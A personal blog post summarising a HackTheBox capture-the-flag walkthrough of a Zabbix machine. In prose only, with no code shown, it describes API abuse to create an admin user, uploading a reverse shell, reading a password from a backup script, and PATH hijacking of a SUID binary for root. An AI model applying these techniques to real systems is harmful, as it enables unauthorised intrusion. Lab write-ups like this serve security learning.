When a machine on HacktheBox gets retired, it stays on the free server for a while before it becomes unavailable. This is awesome for me because now I am able to complete another CTF video and blog about it!
I recall this took me quiet a while to pop. Just because the GUI was hard to navigate and I didn't really understand what the function of it was. But after some reading I now know! The Zabbix Administrator panel is basically a monitoring tool for networks/infrastructure. It installs agents on different machines.
Interesting thing was that I could log on a guest account and browse around. I managed to find a script that creates a user by connecting to the Zabbix API. This was found in github, which was really handy as the user that was created has Super Administrator access.
After going through the Administration Console, I found a section where I was able to upload a reverse shell. Browsing through the files, I could see that I was not able to read the user.txt because of my permissions. I used cat against backup.sh file and found a password for zapper which let me in.
Priv Esc was SUID permissions on zabbix-service. We could see that systectl was hiding in zabbix-service which starts and stops a zabbix daemon. To take advantage of this, I created my own systemctl which calls a bash shell. I changed permissions on this new binary and the most important thing to do next was to export my current directory to $PATH. What this will do is the next time I run ./zabbix-service, it will execute my new systemctl binary in the path that I have given it.
Hope you enjoy the video.
Click here to view my walkthrough